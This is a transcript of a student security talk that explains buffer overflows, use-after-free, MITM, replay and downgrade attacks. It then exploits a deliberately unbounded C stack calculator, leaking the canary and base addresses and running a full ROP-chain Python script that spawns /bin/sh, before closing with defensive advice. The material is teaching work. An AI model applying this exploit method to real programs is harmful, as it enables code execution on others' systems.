THE INVISIBLE ENEMIES

# THE INVISIBLE ENEMIES > A transcript of the talk given on 2022-05-16. > [name=SaVA] ## 1. Introduction Hey everyone! ### The defensive mindset A programmer's job is to solve problems with code. They do so by butting heads with the many things that go awry, having the assumptions turn out wrong and rectifying them, trying to evade the protests of the inner procrastinator and meeting the deadlines — woah, this isn't easy, I should say! But common to the things I listed above is the defensive mindset. Making sure things actually work means you have to come up with a thousand ways they could not and guard against those. ### Going offensive Here we're going to take a break from all that and go offensive. Finding the problems of other people — and using them to your advantage against the poor guy who brought them into this damned world. ### Vulnerabilities The problems we're going to be talking about are called vulnerabilities. Which is basically a kind of a bug that breaks safety assumptions of a program. People use them to do some nasty things: encrypting files, running attacker-provided code, disclosing secrets, spying on your messages — you name it! We call that **exploiting** the bug. Some people manage to shut down whole facilities by exploiting such vulnerabilities. ### You (and the things you love) are under attack! As long as there are buggy programs being made... scratch that, as long as there are programs being made, we're going to have some people poke at them and wonder how they can hack them. Put simply, they're looking around for how they can exploit a bug for their gain. That's called **attacking** a program. So, to reiterate: - A **vulnerability** is a bug that presents security problems. - By **attacking** a program, you use, or **exploit**, its vulnerabilities to do things undesired or unexpected of the program. - An **attack** is a way to break a security defense by exploiting a vulnerability. - An **exploit** is a program that chains attacks to break another program. - And a **mitigation** is a security measure designed to prevent, or at least harden, vulnerability exploitation. Usually by fixing a bug. ### Common targets People like to break... - browsers! - operating systems! Linux, too, contrary to what you might've been told! - mail clients! - document editors! - image viewers! - your home routers! - text messengers! - even fax machines, and cars, and light bulbs! - and other things — especially those you expect the least to misbehave! ### How do they do it? That's rather worrying. How do they do it, though? And we've got to the question we hope we'll answer today. - First, we'll cover some theory on **common vulnerabilities and attacks**. - Then we'll turn to practice and actually **break a small program** to show how it's done! - Finally, we'll tell you how you can **reduce damage from** attacks or **avoid** them altogether. We've got much to cover in so little time, so bear with us and let's go! ## 2. Vulnerabilities and attacks All right, the first thing we'll talk about is what kind of vulnerabilities there are. Actually, there is an unbounded variety of those, so we'll just list a few common ones so that you have a basic idea about them. ### Buffer overflow First of all, a buffer overflow vulnerability. Also called a buffer overrun, it occurs when the volume of data exceeds the capacity of a memory buffer. As a result, the program attempting to write the data to the buffer overwrites bytes outside it. These bytes may be pointers to functions, which are called afterwards, or the return address, which is just a special kind of such a pointer, so the attacker can make a program do something unexpected. ### Use after free Next is a use-after-free vulnerability. Say, a program frees some memory but keeps a pointer there — now dangling. If it dereferences it immediately afterwards, probably nothing bad will happen, since the data is still there. Suppose the memory allocator happens to reuse this chunk of memory for another object. The dangling pointer will then reference this new data. Now if the attacker controls the contents of the new object, they also influence the dangling other and make it look like anything they want. ### Double free And the last of the memory bug triad is double free. Usually, calling `free` twice with the same argument gets a program to blow up. But the checks aren't absolute and can be bypassed. And what does `free` actually do? It adds the chunk to a list of free chunks; and double-free makes the same allocation appear there twice. Then two calls to `malloc` could return the same pointer. Those could happen in completely unrelated parts of the program, and if the attacker controls one of the allocations, they again can change the other object's data. ### MITM Now let's talk about networking-related hazards. As you know, for a packet to reach the other end of a connection, it has to hop through several routers. A malevolent router in the middle of that chain can intercept the traffic and replace the packets, insert malicious data, or drop them altogether without the end parties noticing! This is called a **man-in-the-middle** vulnerability. By the way, there's the TLS protocol that protects you from this. It's also why browsers show you a lock icon in the address bar — they want to boast about using TLS! ### Replay attack Replay attack is a specific kind of a MITM attack. Say, we did everything according to the book, encrypted the traffic, and now no one can tamper with them. Imagine, a certain malicious Mallory intercepting messages going around on the wire. Mallory can't decrypt the packets, but she can instead just send a packet twice. Now imagine the packet asked a bank to wire $300 to my account — I'll get $600! Nifty! Or, if you're hell-bent on being realistic, the packet could order a smart door to open remotely. Not cool. TLS also protects you from that, by the way. ### Downgrade attack Yet another specific kind of MITM is the venerable downgrade attack. Think about the email system for a moment. It's historically been all in plaintext. People who made that didn't care about privacy in the slightest, but then times changed and people got smarter. They started to think how they can protect the mail. Unfortunately, the mail protocol was too widespread to just ditch it in favor of a better one, so they instead added a command literally called `STARTTLS`. TLS is a secure protocol, so it should be fine, right? Well, except that, if Mallory sits in the middle of the connection and strips the packets of this command, TLS won't happen and the mail will be, again, sent in plaintext. Well done. I guess that's enough vulnerabilities for now. There are many more, but we won't be talking about them. If you're interested, we'll give you a link in the end to an article where you can learn more. ## 3. Hacking apart a... calculator As for us, though, given that you're now quite well-versed in the ways of vulnerabilities and attacks, let's put the theory into practice! Today's victim is going to be a stack calculator, please have a look at it: ```c= #include <stdio.h> enum { STACK_MAX = 10, }; int main() { int stack[STACK_MAX] = {0}; int idx = 0; while (1) { char command = -1; printf("command (><+): "); scanf(" %c", &command); switch (command) { case '>': int n = -1; scanf(" %d", &n); stack[idx++] = n; printf("pushed [%d] = %d\n", idx - 1, n); break; case '<': --idx; printf("popped [%d] -> %d\n", idx, stack[idx]); break; case '+': int x = stack[--idx]; int y = stack[--idx]; stack[idx++] = x + y; printf("[%d] = %d + %d = %d\n", idx - 1, x, y, x + y); break; case -1: goto out; } } out: return 0; } ``` Please do look at the code attentively. What will follow now is going to be pretty hard to understand if you've never heard about the topic before, so be prepared. Anyway, looking at it, you see you can push a number (`>`), you can pop it (`<`), or add the top two numbers together (`+`), pretty basic stuff. `stack` here is the number stack, and `idx` is the cursor position where a new number is pushed to. Note how the bounds are not enforced in any way. We'll be using, or, rather, abusing that heavily. Let's see how. ### 3.1. Theory: conceiving the exploitation path #### What is... a function call As you know, the basic idea of a function call is: - you save the return address, - and jump to the first instructon of the function. Then, to return back from the called function, we just restore the clobbered registers and jump to the return address. #### Getting lost on the way back `main` is one such called function. What if we rewrite *its* return address? Sure, it won't return to its caller, but will go elsewhere — to a function of our choice as an attacker! #### Pushing trouble out of the room Assist in our crime will the fact that its return address is stored on the stack alongside the `stack` variable. So, by going out of the array bounds, we'll get to the return address and overwrite it with use of the calculator's `>` command. ### 3.2. Reconnaissance and mitigation bypass The idea is ripe, now let's gather the data. #### Inspecting the stack We'll need to understand the stack layout — that is, where exactly things are in memory. For that we'll use `gdb`. ![](https://i.imgur.com/PnsL0Kt.png) All right, we found the address of the buffer and know where the program stack is located in its address space. Let's... let's just dump the whole contents of the stack. ``` (gdb) dump memory stack.mem 0x7ffdcc096000 0x7ffdcc0b7000 ``` We have to map the addresses in the program to the offsets within the dump file. For instance, we want the address of the `stack` buffer relative to the stack start address; plugging them into a calculator gets: ``` 0x7ffdcc0b5050 - 0x7ffdcc096000 = 0x1f050 ``` Which means if we open the dump and go to this offset, we'll see the contents of the buffer. Now we should find out where the return address is: ``` (gdb) info frame Stack level 5, frame at 0x7ffdcc0b5090: rip = 0x560347b691d2 in main (main.c:16); saved rip = 0x7ff1e92f9b25 caller of frame at 0x7ffdcc0b5030 source language c. Arglist at 0x7ffdcc0b5080, args: Locals at 0x7ffdcc0b5080, Previous frame's sp is 0x7ffdcc0b5090 Saved registers: rbp at 0x7ffdcc0b5080, rip at 0x7ffdcc0b5088 ``` `rip` is the instruction pointer, and saved `rip` is its value prior to the call — hey, that's the return address! And apparently it's stored at `0x7ffdcc0b5088`. Let's compute its relative address too: ``` 0x7ffdcc0b5088 - 0x7ffdcc096000 = 0x1f088 ``` Repeat and rinse! We do all that to the other variables and see the whole scene of what's happening. For that let's finally open the file `stack.mem`. It's binary, so we'll use a hex dumper (`xxd` here): ``` $ xxd stack.mem | less ``` ![](https://i.imgur.com/9D23zQY.png) I went ahead and colored the regions of interest. #### The stack smashing protection ##### Getting back on track Okay, you remember where we were going with this? We overwrite that red-brick-colored area, that is, the return address, with something else and have it pwned. And the writing will be done by the ever helpful `>` command. That's it, right? ##### Not really ``` $ ./calc command (><+): >0 pushed [0] = 0 command (><+): >1 pushed [1] = 1 command (><+): >2 pushed [2] = 2 command (><+): >3 pushed [3] = 3 command (><+): >4 pushed [4] = 4 command (><+): >5 pushed [5] = 5 command (><+): >6 pushed [6] = 6 command (><+): >7 pushed [7] = 7 command (><+): >8 pushed [8] = 8 command (><+): >9 pushed [9] = 9 command (><+): >10 pushed [10] = 10 command (><+): ^D *** stack smashing detected ***: terminated [1] 3922542 abort (core dumped) ./calc ``` ...no, hang on, we'd expect it to segfault because we jumped into the wilderness, not abort on us like that. It seems something went wrong and our criminal desires got oppressed. ##### The one angry bird You know who's at fault? I know! This one's the culprit!!! ![](https://imgur.com/blwullk.png) Well, okay, the thing is, this kind of an attack, called **stack smashing**, is as ancient as the Great Wall Of China, and thankfully people got smarter since then, if only for a little bit. In particular, they've devised a protection against that, called a *canary*. ##### How It's Made: The Bird A **canary** is a unique sequence of bytes which immediately follows an array allocated on the stack in our C programs. The compiler injects code that writes the canary value into memory in the beginning of a function, and it also places a check before every single `ret` instruction. The idea here being, if we overwrite a stack buffer, we'll corrupt the canary bytes. And then, when the process performs the check, it'll find some trash where the canary was supposed to be, and it'll set the program on fire. The `ret` instruction, therefore, won't be run, and the attack is averted — at the cost of the program getting blown up. ##### Spotting the spies above Let's cast our mind back at the stack layout chart. Here I've painted the canary in blueish green. ![](https://i.imgur.com/8LKQpQi.png) Notice something off? Yeah, right, there's an identical clone of the birdie on the stack! The one on the bottom is where we'd expect to find it — immediately following our stack array. The other one, though? Every stack buffer is embellished with a canary, but it just so happens that the canary value is generated once... and then reused. So what happened is, the program called a function, namely `scanf`, that allocated a stack buffer; it got embossed with the canary, and then the function returned and didn't clean it up. And thanks to our `<` (pop) calculator command, we can go arbitrarily far *behind* the array, eventually reaching this canary twin. And then we get the secret bytes. The bird is defeated. May its soul rest in pieces. #### Address space layout randomization The other problem is, we don't know the addresses to jump to. When a program is loaded into memory, all the addresses are shifted by a constant value, called the **base address**. So we find an address in the program binary; we jump there, but the actual address will be different, and we'll end up with an utter failure. Unfortunately for us, this offset is sufficiently random. We can't guess it, so we've gotta find it. ##### Search and rescue The approach we'll take is similar to how we bypassed the canary. Let's squint our eyes quite a bit and sift through the stack dump. We want to find an address pointing within the loaded, say, `libc` memory region, from which we could then derive the base address. In our case `libc` got loaded to `0x7ff1e92d2000`. Let's look for addresses close to it on the stack. And likewise for the `calc` program itself, while we're at it. ![](https://i.imgur.com/tHqejZf.png) We get: - <span style="background: #ebffb8ff;"><code>__isoc99_scanf+178</code></span>, which is `0x596e2` into `libc` - <span style="background: #ba86ffff;"><code>main+121</code></span>, which is `0x11d2` into `calc` So now we hold the **base addresses** in our hands. The last stronghold was overcome. ### 3.3. The exploit; demo #### COURSE CLEAR The course is clear! We've outwitted address randomization and slain the canary flying beyond array boundaries. Are we done? #### But the princess is in another castle... Not really. The program can jump anywhere we will it, but it won't carry any data to the called function. On amd64 we pass data to functions via registers, which is a world away from the stack which we control. To get the data from the stack to a register, we have to use a `mov` or a `pop` or something, and I don't see these instructions lying around on our way to the `ret` instruction. #### Taking a detour The kind of instructions we want, namely `mov` and `pop`, is what you'd expect to find in an *epilogue* of a function. Before it returns, it restores registers to their previous values, which were saved to the stack before they were used. So instead of going straight to the desired function, we'll make a detour to some other procedures so that their epilogues would restock our registers with something more useful. #### Observe the wise ones Now think about Irtegov's lectures. Some smart people would rather die than listen to him, but still want to appear present. What do they do? The attendance is marked at the end of a lecture, so they just ditch it and come there at the very end, hide among the crowd, get in the line, and swipe the pass over the reader. #### Supply and demand Let's heed their wisdom. Since we can choose where to jump, we may as well skip the unnecessary things and jump right to the end of some procedure. We'd supply the values for the `pop` instructions by going even further beyond the return address on the stack, and they'd end up in the registers! #### Forging a chainmail And, what's more, after all the `pop`s we'll find a `ret`. Which pops an address from the stack and jumps there. That means we can send the processor somewhere again if one jump was not enough. A sequence of instructions ending with `ret` is called a **gadget**, and we're essentially linking them together to get what's called a **ROP chain**, where ROP stands for **return-oriented programming**. #### A quest for the missing link All that's left is to find a ROP chain, then. It should prepare the registers and call the final function. Here we'll be making a `syscall` of `execve("/bin/sh", (char *[]) {NULL}, (char *[]) {NULL})`. How do we find the right sequence of jumps? Well, we could go over every function we have in our program (including the standard C library it's linked to), look at the epilogues, and stitch them together somehow. Luckily, there's an easier way, since we've got the tools to do this. #### Ropper The program we'll use is called `ropper`. It's written in Python and very easy to use: ``` $ ropper -f ./calc /lib/libc-2.33.so --chain execve ``` It'll crunch the binaries and spit out Python code that generates the payload that we'll write on the stack. #### Demo After we tweak it a little, we get an `exploit.py` that looks something like this: ```python= #!/usr/bin/env python import array from struct import iter_unpack, pack, unpack def i64_from_parts(lo, hi): return unpack('@Q', pack('@ii', lo, hi))[0] p = lambda x: pack('Q', x) N = 66 print("RUN: >100<" + "<" * N) print("INPUT: program output; terminated by double lf") lines = [] while line := input(): lines.append(line) lines = lines[2:] values = [int(line.rsplit(' ')[-1]) for line in lines] assert len(values) == N # i values[2] = -2 canary = i64_from_parts(values[57], values[56]) libc_addr = i64_from_parts(values[65], values[64]) prog_addr = i64_from_parts(values[9], values[8]) prog_base = prog_addr - 0x11d2 # *rebases* an address *x* by adding the base address of ./calc (prog_base) rebase_0 = lambda x: p(x + prog_base) libc_base = libc_addr - 0x5ec42 # likewise for libc rebase_1 = lambda x: p(x + libc_base) print('libc: 0x{:x}'.format(libc_base)) print('prog: 0x{:x}'.format(prog_base)) rop = b'' # buffer rop += p(0x0000000000000000) rop += p(0x0000000000000000) rop += p(0x0000000000000000) rop += p(0x0000000000000000) rop += p(0x0000000000000000) # canary and padding rop += p(canary) rop += p(0x0000000000000000) rop += rebase_0(0x0000000000001134) # 0x0000000000001134: pop rbp; ret; rop += b'//bin/sh' rop += rebase_1(0x000000000002d52a) # 0x000000000002d52a: pop r12; ret; rop += rebase_0(0x0000000000004030) rop += rebase_1(0x00000000000a3868) # 0x00000000000a3868: mov qword ptr [r12], rbp; pop rbp; pop r12; pop r13; pop r14; ret; rop += p(0x0000000000000000) rop += rebase_0(0x0000000000004038) rop += p(0xdeadbeefdeadbeef) rop += p(0xdeadbeefdeadbeef) rop += rebase_1(0x00000000000a3868) # 0x00000000000a3868: mov qword ptr [r12], rbp; pop rbp; pop r12; pop r13; pop r14; ret; rop += p(0xdeadbeefdeadbeef) rop += p(0xdeadbeefdeadbeef) rop += p(0xdeadbeefdeadbeef) rop += p(0xdeadbeefdeadbeef) rop += rebase_0(0x0000000000001373) # 0x0000000000001373: pop rdi; ret; rop += rebase_0(0x0000000000004030) rop += rebase_1(0x000000000002f181) # 0x000000000002f181: pop rsi; ret; # ! ropper mistakenly uses rebase_1 here... rop += rebase_0(0x0000000000004038) rop += rebase_1(0x000000000010c4f7) # 0x000000000010c4f7: pop rdx; pop r12; ret; # ! ...and here (cf. its output above) rop += rebase_0(0x0000000000004038) rop += p(0xdeadbeefdeadbeef) rop += rebase_1(0x0000000000045480) # 0x0000000000045480: pop rax; ret; rop += p(0x000000000000003b) rop += rebase_1(0x000000000008a386) # 0x000000000008a386: syscall; ret; print("RUN:") for i in reversed(values): print('>{}'.format(i), end='') for (i,) in iter_unpack('@i', rop): print('>{}'.format(i), end='') print() ``` If you want to explore it, we can give you a link to it later, but now we're gonna skip the details and just demo it. #### How it works Just so that you have an idea of what's happened, we'll go step-by-step and see what's going on in the program. > IMG: 01-leave So the program is at the penultimate instruction of `main`. `leave` just moves `rbp` to `rsp` and pops `rbp`. > IMG: 02-ret We're at the `ret` instruction, and `rsp` points to the first instruction of the ROP chain. > IMG: 03-pop-rbp It pops the 8-byte value, which is `//bin/sh`, off the stack into `rbp`. The trailing slash is there to make it 8 bytes long. > IMG: 04-ret Again, a `ret` instruction leads us to the next instruction, somewhere in `libc`. > IMG: 05-pop-r12 There's an area in the memory for global variables, and it's writeable. We'll be preparing the data there, so we pop its address to `r12`. The affected area is displayed on the left, by the way. > IMG: 06-ret Another `ret`... > IMG: 07-mov-qword-ptr-r12-rbp Here we move the value of `rbp`, which is `//bin/sh`, to the address pointed to by `r12`, which is the global variable area we talked about. Watch the memory now... > IMG: 08-pop-rbp It was all zeroes and now it's `//bin/sh`! Now we want an array of `char *` (char pointers) with a single element — a `NULL` pointer. A null pointer is 8 zero bytes, which we load into `rbp`. > IMG: 09-pop-r12 As well as the address — in the memory view, it points to the second line. > IMG: 10-pop-r13 There are two more instructions which pop to some registers we don't need. Let's just clobber them with some junk — in our case, that will be `DEADBEEFDEADBEEF` in hexadecimal. > IMG: 11-pop-r14 > IMG: 12-ret We want to do another memory write, so we'll jump back to the first instruction. > IMG: 13-mov-qword-ptr-r12-rbp Here we go again, but with slightly different address and data. > IMG: 14-pop-rbp The next four instruction are useless to us; we just fill the registers with some junk. > IMG: 15-pop-r12 > IMG: 16-pop-r13 > IMG: 17-pop-r14 > IMG: 18-ret We're going to make a `syscall`, which takes its parameters via registers. Let's go ahead and prepare them. > IMG: 19-pop-rdi First, the `rdi` register. It stores the first argument of a syscall. In our case it's the path to the program. We supply the address of the first line displayed in the memory view. > IMG: 20-ret A return... > IMG: 21-pop-rsi Now it's `rsi`'s turn. `rsi` stores the second argument of a syscall. We set it to the address of an array consisting of only a null pointer. > IMG: 22-ret Done here, next one... > IMG: 23-pop-rdx `rdx` stores the third argument of a syscall. We'll use the same address we had for `rsi`, the second argument. Apparently it's perfectly legal. > IMG: 24-pop-r12 There's a useless instruction; we give junk to it. `pop r12` is thrilled with junk we gave it. `pop r12` is happy. > IMG: 25-ret But we move on; we've got one more register to set up! > IMG: 26-pop-rax And that's `rax`, which has the actual number of a syscall we're going to make. The syscall is `execve`; it's number is `59`, or `3b` in hexadecimal. > IMG: 27-ret Done with the preparation! Let's go to a syscall instruction! > IMG: 28-syscall We're finally there. - `rax` stores 59, the number of the `execve` syscall. - `rdi` has `//bin/sh`. - `rsi` and `rdx` both point to an array of one pointer, which is a null pointer. Put together, this instruction now executes the equivalent of `execve("//bin/sh", (char *[]) {NULL}, (char *[]) {NULL})` — just what we wanted! And we've got the shell. ## 4. Defense measures What a scary story we just told you. And it could happen to **your** program. So how do you protect against all this? ### Isolation Isolate and limit processes as much as possible. If your program doesn't need network, deny it access to it. Same for files. The less your program can possibly touch, the less likely a disaster is to occur. ### Secret minimization Store as little sensitive data as you can. You don't need to store passwords, for instance, when hashing will do. After all, a hacker can't get things you don't have, even if they manage to hack you. ### Audit You know how you spend much time looking for a bug, ask other people for help, and they immediately find what's wrong? Same idea: hire an audit company that thoroughly tests and inspects the program for you. Sometimes the correctness of a program is even proved using formal methods. It's quite slow and costly, so it's not used much in practice, save a few specific, safety-critical industries — for instance, formal verification is widespread in hardware design industry. ### Using ready-made cryptographic systems Don't invent your own crypto! Use libraries made by other, trustworthy people. After all, they already went through all the trouble to ensure security. ### Updates Finally, updates. A program often has a ton of dependencies, and each may have the same problems we just talked about. Good news: virtuous people regularly report these problems and fix them. Bad news: you have to update a vulnerable dependency to profit from that. Staying up-to-date won't protect against vulnerabilities still unknown, but it at least forces the attacker to spend time studying the program instead of exploiting already known bugs. The list is not exhaustive, and there are many more ways to guard against attackers. But simply doing all of the things above can help significantly reduce the attack surface of your programs and deter hackers, except for the most stubborn ones, from targeting you. I consider that a good thing, and you should too. ## 5. Conclusion The final part! We've told you about attacks, vulnerabilities, and security measures. We even went as far as to actually hack a program, although a contrived one. Hopefully you've got some of what we said sitting there in your mind now so that you won't be as likely to turn out to be a cause for the next cybersecurity disaster to come. But in case you didn't, don't fret and panic; we've got you covered with plenty of reading you can do in your spare time if such need arises. For a detailed overview of vulns and defenses, see [this article](https://hackmd.io/@slowlime/SyNPM-r-9). And the step-by-step guide to hacking a calculator, basically what we've shown you, is available [here](https://hackmd.io/@slowlime/SJfRzQqeq). We'll also publish a transcript of our talk! And now that's all we had for you today. Thanks for listening!